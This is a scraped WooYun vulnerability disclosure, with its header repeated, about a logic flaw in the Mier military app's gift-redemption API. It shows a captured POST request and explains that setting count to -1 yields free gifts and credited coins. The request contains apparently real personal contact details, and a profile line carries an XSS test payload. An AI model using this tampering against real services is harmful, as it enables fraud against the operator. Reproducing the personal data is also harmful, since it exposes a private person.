米尔军事app礼品任意兑 | wooyun-2015-0122406| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0122406

漏洞标题：米尔军事app礼品任意兑

漏洞作者： DloveJ

提交时间：2015-06-24 16:35

修复时间：2015-08-08 16:36

公开时间：2015-08-08 16:36

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：12

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-06-24：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-08-08：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

app 礼品

详细说明：

积分兑换礼品处

确定的同时抓包

POST /api/2.0.3/app_integral_exchange.php?plat=android&proct=mierapp&apiCode=1 HTTP/1.1
Content-Length: 234
Content-Type: application/x-www-form-urlencoded
Host: bbs.mier123.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; zh-cn; MX4 Build/KOT49H) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Cookie: jc7_sid=39dcJj
Cookie2: $Version=1
Accept-Encoding: gzip
uid=495505&id=65&count=1&name=%E5%88%98%E4%B8%9C&phone=15104869199&address=%E5%86%85%E8%92%99%E5%8F%A4%E5%8C%85%E5%A4%B4%E5%B8%82%E6%98%86%E9%83%BD%E4%BB%91%E5%8C%BA%E5%86%85%E8%92%99%E5%8F%A4%E7%A7%91%E6%8A%80%E5%A4%A7%E5%AD%A6&cat=0

然后将count改为-1

就会兑换成功！
注意了，，同时，他会有相同数量金币的反倒你的账户上，估计是负值的缘故。
然后我们就不用改了，直接买也可以。。

漏洞证明：

修复方案：

版权声明：转载请注明来源 DloveJ@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞评价：

2015-06-24 16:38 | 0x 80 ( 普通白帽子 | Rank:1301 漏洞数:398 | 某安全公司招聘系统运维、渗透测试、安全运...)

大黑客
2015-06-24 16:50 | DloveJ ( 普通白帽子 | Rank:1107 漏洞数:200 | <a href=javascrip:alert('xss')>s</a> 点...)

@0x 80 哪有@ 你才是个大黑课！
2015-06-24 16:54 | 0x 80 ( 普通白帽子 | Rank:1301 漏洞数:398 | 某安全公司招聘系统运维、渗透测试、安全运...)

呵呵，你少来
2015-06-24 16:54 | 0x 80 ( 普通白帽子 | Rank:1301 漏洞数:398 | 某安全公司招聘系统运维、渗透测试、安全运...)

宇喧，找到女朋友没
2015-06-24 16:59 | DloveJ ( 普通白帽子 | Rank:1107 漏洞数:200 | <a href=javascrip:alert('xss')>s</a> 点...)

@0x 80 没啊。长得太丑。。
2015-06-24 17:02 | 0x 80 ( 普通白帽子 | Rank:1301 漏洞数:398 | 某安全公司招聘系统运维、渗透测试、安全运...)

你又装了
2015-06-24 17:03 | 0x 80 ( 普通白帽子 | Rank:1301 漏洞数:398 | 某安全公司招聘系统运维、渗透测试、安全运...)

明明长得帅爆了
2015-06-24 17:05 | DloveJ ( 普通白帽子 | Rank:1107 漏洞数:200 | <a href=javascrip:alert('xss')>s</a> 点...)

@0x 80 我对自己还是有那么些自信的。@@你有没有见过我

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0122406

漏洞标题：米尔军事app礼品任意兑

相关厂商：米尔网

漏洞作者： DloveJ

提交时间：2015-06-24 16:35

修复时间：2015-08-08 16:36

公开时间：2015-08-08 16:36

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：12

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 DloveJ@乌云

漏洞回应

厂商回应：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0122406

漏洞标题：米尔军事app礼品任意兑

相关厂商：米尔网

漏洞作者： DloveJ

提交时间：2015-06-24 16:35

修复时间：2015-08-08 16:36

公开时间：2015-08-08 16:36

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：12

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0122406"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 DloveJ@乌云

漏洞回应

厂商回应：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：